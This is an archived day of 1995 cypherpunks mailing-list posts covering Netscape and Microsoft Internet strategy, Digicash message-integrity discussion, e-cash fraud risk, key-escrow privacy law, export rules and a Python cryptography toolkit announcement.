PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on homepage & servers) <liberty@gate.net> 
PGP encrypted mail enjoyed, even if it's _not_ "important." IANAL
- -----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMMdHO21lp8bpvW01AQEZDgP9Hw8Ymf2zHMY59+TUE6N8+v+WHSeAXsQk
Kg7j3Z5jWwPSZopVL2joXolW2t41vDbFEgr5eclweGJXHkLiJdnlPEwGhr+rtf/n
dqv/m/o99kBf92D7nCME3nzMxJ1c4eQcGwFBjBZRvysQZ6PU/s0sSo5xqd5g2Qku
icleREE+aVc=
=4NSh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 7 Dec 95 12:13:00 PST
To: cypherpunks@toad.com
Subject: Re: FW: websurfer 4.6
Message-ID: <199512072012.PAA21672@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Dec 1995, Anonymous wrote:

> Not surprising. They confuse random doodling with software, too.
> 
> The real problem with NetManage is a severe case of brain death.

My, thanks for your opinion.

It may interest you to know that Microsoft recently licensed a bunch of 
stuff from NetManage (San Jose Merc, no real details given).

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMdKlSoZzwIn1bdtAQGYYgF8CIf5Trt1E5YdMCna43irv5MeGgFnzSvP
KXQ0ZR22U9MqbFAbrTjVKUB4ojC30lwo
=+3ha
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Thu, 7 Dec 95 14:17:52 PST
To: cypherpunks@toad.com
Subject: Netscape stock on 12/7/95
Message-ID: <9512072217.AA16206@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


16% tumble today...

   ...is the word getting out?


--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://XXXXXXXXXXXXXXXXX/adam  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 12:34:49 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Inherent Insecurity of Internet Commerce! (was RE: Secret
Message-ID: <199512072035.PAA04297@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


various people wrote:

> OK, I'll try again. First, as I recall, SECRET clearance 
> is actually not very high: when I got it, I had to answer 
> a bunch of questions (do you abuse illegal drugs? are 
> you now or have you ever been a member of any 
> organizations? have you ever been _arrested_ for anything?) 

[and]

> 	I suspect I know what organizations they're interested in (CPUSA et
> al), but did they ask about any specific organizations?

I think this discussion of background checks for clearances has gone
rather far astray of cypherpunks relevance, folks....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Dec 95 06:39:07 PST
To: cypherpunks@toad.com
Subject: Prayers Pay
Message-ID: <199512071440.PAA02476@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   The raiders hit early this morning, banging the door about
   4 AM, me groggily peeking out, a subpoena wadded into my
   shirt, then the bastards barged in. My ex-wife holding
   back, grinning like shit, saying you're fucked this time
   Johnny wee-dick.

   The black suits took all of it, computers, backup disks and
   tapes, printers, scanners, plotters, fuck, even the
   phones and message box -- jeez, why those?

   Harassment, teaching you a lesson, Bess my shark phoned
   just now, they shut your business down, take weeks to
   rummage the equipment and data, give it back slowly, one
   at a time, no hurry, wanting you to ache in case they find
   nothing. Swift justice, she hisses, even if you're
   innocent, cause nobody really is, they want you to scream,
   use you to broadcast a scare.

   Fuckups are getting gutted all over that Net Playboytoy.
   Six others this week, Bess coughs on, dragging deep, it's
   gonna rain even heavier in Exon's maelstrom, sweet darling
   maryjesus, prayers pay.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 7 Dec 95 13:50:49 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISE] Re: FW: websurfer 4.6
In-Reply-To: <Pine.ULT.3.91.951207131535.13367F-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951207154059.21791B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Rich Graves wrote:

[snip]
> Microsoft's strategy is to support VB.
[snip]
> -rich
> 

Its interesting to note that all the people that were raving mad about Java
seem to be quiet now that MS is proposing to use VB. At least Java was 
designed from the ground up with security in mind. But VB? Actual binary
DDL running around. Just as an explame look at Oracles new PowerBrowers.
They have what they call CSP (or client side processing) which are just that
VB DDL's that you keep in your machine and if you dont have one d/l.
Now their docs say that once you download all it does is warn you
so you can authenticate it and scan it for viruses. This is not good.
Wanna bet who many people dont? And this is not like Netscape plug ins.
Where Netscapes plug ins are ment to handle major content types (like 
streaming video) and you would get them from a company that then you can sue,
CPS are ment to be used anywhere fron plugins type apps down to Java type 
applets like a ticker tape (their exmaple).

Also not that Oracle included BASIC as their client side scripting language.
By readin gthe web pages I saw that the scripts seem to have access
to the clients history, profile, et la. Anyone for a "Hack Oracle Content"?
I will d/l today an play with it, if I mind by guess true who will give
me a t-shirt?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@guaymas.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 7 Dec 95 12:57:33 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512072056.PAA21957@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9512071804.A21520-0100000@unicorn.com>,
Rev. Mark Grant <mark@unicorn.com> wrote:
> I think he means you shouldn't use a stream cipher like RC4 that XORs the
> plaintext with the generated keystream, since if you know part of the
> plaintext, you can XOR those bytes with (the id you want) XOR (the id
> being sent) and change the encrypted data so that the payment goes into
> your account and not theirs.

Right.

RC4 encryption doesn't provide message integrity.

And I should mention that block ciphers like DES in chaining modes
like CBC don't provide message integrity either -- it's a bit harder,
but an active attacker can still tamper with the ciphertext to modify
the plaintext in a predictable way, like with RC4.

I admit it's a more difficult to mount this attack against a block
cipher in chaining mode, and the success probability may go down
(depending on the circumstances), but hey! paranoia is your friend;
and my point remains valid:

	Don't count on encryption to give you message integrity.
	If you need message integrity, use a MAC.

If you want a citation for this basic crypto design principle, I'll
be happy to provide one.

>                              This is a tough, but potentially feasible
> attack if you use that kind of encryption scheme. 

Tough!?  It's trivial for an active attacker, in the stream cipher case.
He just xors some bits: no clever cryptanalysis needed.  (Or did you mean
it's tough to mount an active attack?  I agree: that requires significant
knowledge or motivation.)

> Is there anywhere that you could use a similar attack on SSL ?

Not in SSL v3.0; it explicitly uses a (cryptographically strong) MAC
(message authentication code) on each message to prevent tampering
and modification.

Dave Wagner, speaking for himself,
but thankful for all those behind the scenes who are helping
to improve and open up Digicash communications.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMdVCCoZzwIn1bdtAQHEvQF/c1wmuVWCpmMo+4jY0cNlrrKD/5vYb/st
xC2dFLgb1ydJm6kfWRw0Hz8vF55tzj9t
=N+Gr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 7 Dec 95 15:59:41 PST
To: cypherpunks@toad.com
Subject: More FUD from First Virtual
Message-ID: <v02120d01aced1ca6830e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



It is important to remember that Nat Borenstein is a principal
in a company that very much does not want to see anonymous e-cash
succeed. Their extremely backwards technology cannot compete in
the long term with cryptography-based methods, and therefore they
are compelled to run around the country and on the Internet, bad-
mouthing cryptography and anonymity at every turn, while pointing
to some charity work for Phil Z. as a fig leaf to cover their
actions in this regard (sort of like Exxon building an artificial
reef and claiming to be friends of the environment.)

I have, on several occasions, refuted his "infinite liability" rant,
but it keeps on resurfacing. A few months ago, I wrote a short tech
note on why this claim doesn't hold water. I thought I might stretch
it into something longer, but other things have more urgently
grabbed my attention. It's available at:

http://www.communities.com/foo/noninf.txt

Also, I haven't had time to confirm it, but based on conversations with
and hints from Digicash people online, I'm pretty sure they are doing
something similar to this (possibly better) that they are hoping to
patent.

--doug







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Thu, 7 Dec 95 13:28:43 PST
To: unicorn@polaris.mindport.net
Subject: Is there a lawyer in the house?
In-Reply-To: <199512071807.KAA07498@comsec.com>
Message-ID: <9512072127.AA28756@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST)
>From: Black Unicorn <unicorn@polaris.mindport.net>
>Subject: Re: Netscape gives in to key escrow

>An individual has no legitimate expectation of privacy in the encryption 
>numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
>those numbers to the government when he purchased the software.

It could be even worse.  I was on a panel last year with Scott Charney (sp?)
(I believe from DoJ) during which he commented that if you give your secret
key to anyone -- e.g., your own company -- then you have given up the
presumption of privacy.  That leaves the police open to get that secret
without a warrant.  This claim should be checked by a real lawyer.

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMdbP1QXJENzYr45AQF64QP/dXHnfLuh6FFwCY2GxKNYC5lHlj/hcFmy
KqwWLYVqyr5vf/ZFEA6wlnVRMAARnenfCDmu7XQ9v9YzRjVrpjQMQAFrl9qlBivB
5wFGYSLME9sVtKIIPR0YSV8Xbw613bLmEnKiGrXxPNQ/bkaO30WOxG3N9Oen9DX4
sFfVbA+Ek0c=
=CEEO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 15:11:28 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
Message-ID: <acecb41c02021004f4ed@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:27 PM 12/7/95, cme@acm.org wrote:

>It could be even worse.  I was on a panel last year with Scott Charney (sp?)
>(I believe from DoJ) during which he commented that if you give your secret
>key to anyone -- e.g., your own company -- then you have given up the
>presumption of privacy.  That leaves the police open to get that secret
>without a warrant.  This claim should be checked by a real lawyer.

Huh?

You mean if you give me your key the police can get it from me without a
warrant? What if I don't want to give it up, and you don't? How would the
police get it without a warrant?

(And "I" could be your employer, so the point is clear.)

And even more strikingly, what if you give your private key to your lawyer
for safekeeping? Has attorney-client privilege gone away?

(Granted, there are ways to break attorney-client privilege, but these are
rare exceptions. In any case, the police could not get the private key
without a court order, warrant, whatever.)

I can believe that some cases of giving up keys wipes out one's arguments
based strictly on "privacy," but not that it wipes out other arguments.

It seems to me that if one wants to voluntarily escrow private keys, for
safekeeping, one's personal lawyer is a safe bet: it is very difficult to
break this kind of attorney-client confidentiality, from what I know of
such things.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 7 Dec 95 13:42:36 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <v02120d30aceb5c57b23c@[199.0.65.105]>
Message-ID: <kklpxbOMc50e1DgT9u@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


[I'll respond to several people's comments on this thread all at once.]

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Robert
Hettinga@shipwrig (6688*)

> >To be perfectly clear:  our minimum service charge is 30 cents, not 5
> >dollars.  If we didn't think it was worthwhile to take transactions that
> >small, we wouldn't do so.

> Fine. Are we including the cost of the credit card transaction to the
> consumer? Fees, interest, that stuff? There are lots of hidden costs in a
> book entry system. With a bearer-certificate system, the price is the
> spread between the certificate's bid and asked prices for (a traveller's
> check, for instance, is asked at a primium, and redeemed at face value, for
> instance. That's all the cost of using them.)

This includes *everything*.  The 29 cents plus 2% includes all
credit-card related fees.  

> That may be true, Nathaniel, but just because the people who bring the
> money off the net need to be identified to the digital cash underwriter's
> (actually the underwriter's bank's) satisfaction, doesn't mean that the
> trades on the net can't be totally anonymous. We've gone over this before.

Yes, this is absolutely true.  I didn't mean to imply otherwise.  The
question is whether or not the possibility of true anonymity in the net
transactions might widen the door for fraud on the conversion.  I think
that it does, in the sense that there's no good way to answer the
question, "is it reasonable for Robert Hettinga to be cashing in $2
million of ecash today?"  In a non-anonymous system, audit trails could
be called up automatically on any "suspiciously large" transaction, and
this would help to limit fraud (along with some other, less desirable
social consequences).  I'm not saying that this kind of accountability
would necessarily be a good thing, merely trying to explain why banks
are leery of true anonymity.

> So, given that model, what's the problem?

None at all, if you can find an underwriter who is comfortable with the
fact that his investigative options will be limited in the case of
suspiciously large or suspiciously frequent "cash out" events from a
given customer.  Apparently Mark Twain Bank finds that risk acceptable. 
I'm sure the larger banks will be watching quite closely.

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Wei
Dai@eskimo.com (1462*)

> >..... There's a good reason that most
> > companies have "Ltd" after their name instead of "Unlimited", in those
> > countries where that's the naming convention.

> I find this argument totally unconvincing.  No risk is unbounded.  The 
> worst thing that can possibly happen is that a nearby star goes supernova 
> and completely destroys the earth.  Yet markets handle this 
> low-probability risk quite well.

> The direct cost of a break-the-bank catastrophic failure is bounded by the 
> amount of capital the bank has.  This is because the market will not 
> accept more liabilities (real or forged) from the bank than its capital.  
> There may be other indirect costs resulting from dislocations, but these 
> should also be proportional to the size of the bank.  Therefore your 
> argument is really against centralization and for diversification and 
> distribution.

I'm sorry, when I said "unbounded" I was talking in a practical sense. 
Very few banks are willing to undertake a venture in which there is a
very-low-probability risk of a failure that is only bounded by their
total asset pool.  Technically, you are correct, that is always the
practical bound.  From a bank's perspective, however, "enough to break
the bank" is a good working definition of "unbounded risk".  They like
their risk bounded at a slightly lower threshhold... :-)

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. "E.
ALLEN SMITH"@mbcl.ru (1656)

> 	The risk in question is not infinite-cost. If the person who gets
> ahold of the keys starts simply making lots and lots of money, in a free
> market the prices in digital cash for everything will start going up. This
> phenomenon will be spotted, and those taking the particular variety in
> question will stop accepting it. Losses are limited to however much was out
> there at a given time, and if there are multiple systems with free-market
> interconversion between them, that may not be very much. People will move
> out of a decaying monetary system if: A. the new system is as easy to get
> as the old; and B. the new system is as easy to spend as the old.
> 	If the person who gets the keys simply uses them on a small scale,
> then the resulting inflation and loss of value can simply be dealt with
> using the discount mechanism. It's no longer infinite risk.

Basically, the criminal in this scenario has a choice between greed and
vandalism.  If he's motivated by greed, and he's clever, he'll push
things slowly in the inflationary direction, as you describe.  If he's a
vandal or terrorist at heart, however, he might get more satisfaction
out of generating the equivalent of overnight inflation at the
billion-percent level.  That's not a decaying monetary system, it's a
suddenly-collapsing monetary system.   The only difference between those
two scenarios is the quantity of bad money the criminal chooses to print
and distribute.  (Note that this is very different from physical
counterfeiting, where the logistics of actually feeding trillions of
dollars into the money supply are quite daunting, and make the
catastrophic-vandal scenario more or less impossible.)

Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Peter
Monta@qualcomm.com (892*)

> Why "the bank", rather than "all banks"?  If there is a single
> cryptographic point of failure in a widely used ecash system,
> it seems unlikely that diversity would buy you anything.  The
> worry would not be the compromised keys of a single bank, but
> rather, say, an effective cryptanalysis.  I would put this in
> the supernova class; it may be just as unlikely.

There's a big difference between breaking the algorithm and stealing the keys.

To break a cryptographic algorithm requires either a revolutionary
mathematical discovery or the discovery of a subtle coding flaw.  The
former is in the supernova category, and the latter is probably in the
"major hurricane" category.  However, stealing the keys is a relatively
simple computer crime.  You break into a computer somewhere and steal
some information.  It only breaks a single bank, but that's enough to
satisfy most criminals.....  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 15:22:37 PST
To: cypherpunks@toad.com
Subject: CPUSA = CypherPunks USA?
Message-ID: <acecb626030210046f83@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 12/7/95, E. ALLEN SMITH wrote:

>        I suspect I know what organizations they're interested in (CPUSA et
>al), but did they ask about any specific organizations?

CPUSA? You mean "CypherPunks USA"?

I agree that being on the Cypherpunks list is probably a serious threat to
one's security clearance. After all, the things we talk about are
destabilizing to governments, are conducive to creating open channels for
releasing material anyone thinks is useful to be released, and even makes
espionage trivial.

(We seldom mention this, it being old hat, but the Aldrich Ames' of the
world need no longer resort to archaic tradecraft such as leaving messages
in Coke cans in the crooks of trees--digital dead drops are as close as
your nearest PGP package and remailer. This is a revolution in
espionage--not that I am advocating or condoning it, although it is often
necessary and even moral.)

Given that many of us take an explicitly trans-national approach, with
little or no loyalty to local and national governments, and given that many
of us advocate a Nietzschean kind of personal choice in deciding which laws
to obey and which to ignore, our outlook is probably as dangerous to secret
programs as membership in the Communist Party would be (especially these
days, where membership in the CP would be seen as either a sign of slow
thinking or quaintness).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Kuchling <andrewk@dexotek.ca>
Date: Thu, 7 Dec 95 13:58:51 PST
To: cypherpunks@toad.com
Subject: Python Cryptography Toolkit v1.0.0
Message-ID: <9512072158.AA15573@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just uploaded version 1.0.0 of the Python Cryptography Toolkit, a
collection of cryptographic routines for the Python programming language.
It's at ftp://ftp.cwi.nl/pub/pct/pycrypt100.tgz.  All my code is public
domain; some of the algorithm implementations are GPLed.

	The Toolkit now contains various cryptographic algorithms such
as DES, IDEA, MD5, etc.  I will fix bugs in the software, and may add
or remove the odd module if some startling new research result comes
out, but things should be pretty stable from now on.

	The algorithms available are:

Hash functions: Haval, MD2, MD4, MD5, SHA.
Private-key encryption: 
	Blowfish, DES, DES3 (Triple DES), Diamond, IDEA, Alleged RC4, 
	32-bit RC5, REDOC III. 

Public-key: Digital Signature Standard, ElGamal, RSA.  (There's a
	non-functional ESIGN module included, too; I'll finish it
	for a subsequent release.)

	Python is an interpreted scripting language; see
http://www.python.org for more information, the source code, and
binaries.  It includes arbitrary-sized integers, so the public-key
algorithms are implemented in pure Python; this entails a speed
penalty, but makes the code more valuable for educational purposes.

	A sample usage of a hash algorithm (MD5) is:
>>> import md5
>>> hash=md5.new()
>>> hash.update(message)
>>> hash.digest()
'\235\361\034\357\217MX\2246\226\367\366Ebx\326'

	A sample use of an encryption algorithm (IDEA, in this case) is:
>>> import idea
>>> obj=idea.new('This is a key456', idea.ECB)
>>> message="The answer is no"
>>> ciphertext=obj.encrypt(message)
>>> ciphertext
'\2325$\343=)d\341^\025<\344\013\204 T'
>>> obj.decrypt(ciphertext)
'The answer is no'

	Questions, comments, or suggestions are welcomed at the
address below.


	Andrew Kuchling 
	andrewk@cst.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 7 Dec 95 14:12:45 PST
To: cypherpunks@toad.com
Subject: revised librand now on ftp.research.att.com site
Message-ID: <199512072219.RAA04588@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the noise, but I just discovered that the librand.shar file
that I put in my ftp directory got garbled somewhere along the line.
I've repaired the damage and put a correct version of the file in:
    ftp://ftp.research.att.com/dist/mab/librand.shar
(Worst of all, the garbled version actually compiled, but you can
tell you have it by its failure to link properly).

Again sorry for the noise.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 16:01:24 PST
To: cypherpunks@toad.com
Subject: Internet Stocks
Message-ID: <acecb88804021004fee3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 12/7/95, Adam philipp wrote:
>16% tumble today...
>
>   ...is the word getting out?
>

A few of you have corresponded with me about investments, Internet stocks,
etc., so I reckon there's enough interest out there to share a few thoughts
with you. Those who think this list has only to do with number theory or
PGP are of course welcome to skip this message now and get back to reading
Koblitz.

I won't say anything negative or positive about Netscape per se, but here
are some various developments:

* A Smith Barney analyst today made essentially the same sort of comments
that I (and maybe another or two) made several days ago, namely, that the
market capitalizations are incredible ($7 B for Netscape at $170/share),
that browsers are not a proprietary "franchise" (in that the standard is an
open one), that a lot of competition is coming (Spyglass Mosaic, Oracle,
Microsoft, etc.), and that many people hysterically bidding up the price of
Internet stocks are barely aware of what this "Internet thing" is. He
issued a "sell" recommendation on Netscape, an "underperform"
recommendation on Netcom, Spyglass, UUNet, etc., and was generally bearish
on the sector. (I saw him interviewed on CNBC, minutes before Marc
Andreessen was interviewed.)

* From a high on Tuesday of $170, Netscape was down to $130 at one point
today. I haven't seen the closing price.

* Analysts are also closely looking at the February '96 end of the
"lockout" in some stock sales by Netscape employees. Basically, a lot of
the shares that went to employees, etc., cannot be sold for 180 days after
the IPO, which was in early August of this year. The effects of shares
being put on the market is not clear, of course, and it is possible the
effects will be minimal. Still, it might be prudent to take this account
when considering strategies.

* Microsoft also made announcements indicating a move closer to a standard
Web browser strategy (as opposed to trying to sell the world on Microsoft
Network).  deal with Spyglass, and a licensing of JavaScript. (There've
been too many deals connected with browers, Java, etc. for me to even begin
to summarize here.)

* Sentiment moves in waves, as per the Dutch tulip bulb scenario, and what
was headed for the moon a few days ago is suddenly a turkey, to many. The
whipsawing in Netscape, UUNET, Netcom, etc., is incredible: up 30 points in
two days, then down 30 points in two days!

By the way, some have sent me mail asking about how to sell these and other
stocks short. One can sell them short directly (getting the money now and
agreeing to deliver the shares at a later date), but this is risky, should
these stocks rise. (And some of these shares are not readily available for
short sales, due to the limited number of shares on the market and the
difficulty of finding someone to lend the shares for a short sale.) One's
risk is essentially unbounded (but practically there are some reasonable
limits to how much the stock can rise, of course). Short sellers are always
advised to remember this maxim:

"He who sells what isn' his'n, must buy it back or go to prison."

(It is said that some of the rise in Netscape stock price is due to "the
shorts running for cover." That is, those who shorted the stock at, say,
$80 are frantically trying to buy the stock to close out their positions.
This can cause the relatively few shares to be bid further and further up.
As I keep saying, be careful in believing this or not.)

A safer strategy is to buy puts and calls, or to sell puts and calls.
Buying "puts" (my mnemonic: the right to "put it" to another investor)
involves, say, buying the right to sell a stock at some price in the
future. Thus, one might buy a put on the Internet Index
(http://www.amex.com), a collection of Internet-related stocks, to sell the
IIX at $25 in April, '96 for a strike price of $255. If the IIX goes _up_,
and as April approaches, that put will become worth less and less and may
become worthless. If the IIX goes _down_, that put becomes more worthwhile
(because one has the right to "put" it someone for $255 when the actual
value of the IIX has dropped to, say, $200. (Roughly speaking, at
expiration in April '96 this put will be worth $55, for a doubling of one's
original investment; the pricing of options depends on a lot of things,
including risk, time value of money, expectations, etc.)

At this point there are no widely-available puts and calls on most of the
recent high-fliers on the Internet. This is why the IIX looks to be a way
to play this game.

Interested investors should also look at LEAPs, which are essentially puts
and calls with much longer expiration dates. A friend of mine bought $25K
worth of Intel LEAPs (JAN96s) during the height of the Pentium debacle,
when Intel was trading at $30, and in the next six months this $25K
investment became worth over $300K.

(Needless to say, your mileage may vary. Don't blame me if you lose your
shirt. Bulls make money, bears make money, but pigs never make money, as
another maxim goes.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Thu, 7 Dec 95 08:30:16 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <9512062236.AA01307@alpha>
Message-ID: <Pine.NXT.3.91.951207171726.21974V-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain



I don't know the US-Export regulations very well, so please
allow a quick one:

Maybe a legal way around the keysize-regulation would be:

Many US companies have subsidiaries <sp?> outside the US.
Some of them are leaded by non-US-citizens.

1) The U.S.-company engineers a software with strong (but legal) 
   crypto for use inside the U.S. The program is sold in the U.S.
   At the same time the company exports the sourcecode of the
   program *without* any crypto at all to their subsidiaries.
   (should be legal)
2) one or more of the subsidiaries include "self-engineered"
   crypto-routines into the program-"hull" they received 
   from inside the U.S.
   This program is sold in th subsidiaries countries (Europe etc.) 

Two things have to be assured:

- Both crypto-routines have to be compatible
- No U.S.-citizens must be involved in the engineering of the 
  subsidiaries crypto-routines.


Any comments?

	ohuf.
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Thu, 7 Dec 95 14:43:44 PST
To: "'cypherpunks@toad.com>
Subject: Micro$oft and Java
Message-ID: <01BAC4CB.B3611840@loki>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft announced its Internet plans, and is considering licensing Java 
from Sun Microsystems. Other parts of the plan: OLE controls that can be 
transmitted over the Web, acting like applets; Web-related enhancements to 
Visual Basic; commerce, security, publishing and server software. [WSJ 12/7 
p.B8]

IBM joined the ranks of companies licensing Java software from Sun 
Microsystems. The company plans to integrate the technology into all its 
Internet software and operating systems, including the version of Windows 
3.1 it sells. [NYT 12/7 p.D2] [WSJ 12/7 p.B8] 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 7 Dec 95 18:04:10 PST
To: cypherpunks@toad.com
Subject: Re: Micro$oft and Java
Message-ID: <199512080205.SAA02898@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I was at the Microsoft presentation.  Crypto-relevant info:

A patch will be published in the next few days to address the weak .PWL
encryption.  I got a rather lame excuse about how the encryption was first
implemented in 1991, and how it was sufficient then.  They will supposedly
be changing the seed.

I asked about what MS was doing in regard to future strong crypto.  Got an
interesting response in that that "the government was going to let them
implement 768 bit keys."  I later asked an MS person if these were RSA
session keys or what.  He said yes, but I really don't think he knew what he
was talking about based on some of his other comments.

Visual Basic Script will be MS's response to JavaScript.  The interesting
thing here is a plan to use digital signatures on controls and scripts as a
means of authentication.  The comment was made "you'd trust something signed
by Lotus or some other big name, but you probably wouldn't be that trustful
of a piece of shareware."  Hmmm...

MS will be releasing a "safe" runtime version of Visual Basic that will
supposedly prevent nasty virii and trojan horses from being implemented on
Web pages.  IMHO, Perry's previous comments on the security of Java apply.

Servers and some clients will support end-to-end encryption.  No details...

I didn't ask about GAK.  Bill said there was a white paper explaining
Microsoft's position on encryption.  Maybe I'll test the search capabilities
of the MS Web site later tonight.

Overall, the presentation was interesting (but obviously lacking in
technical details as the audience was mostly press).  MS is going to throw a
lot of resources at this in order to maintain its industry dominance.

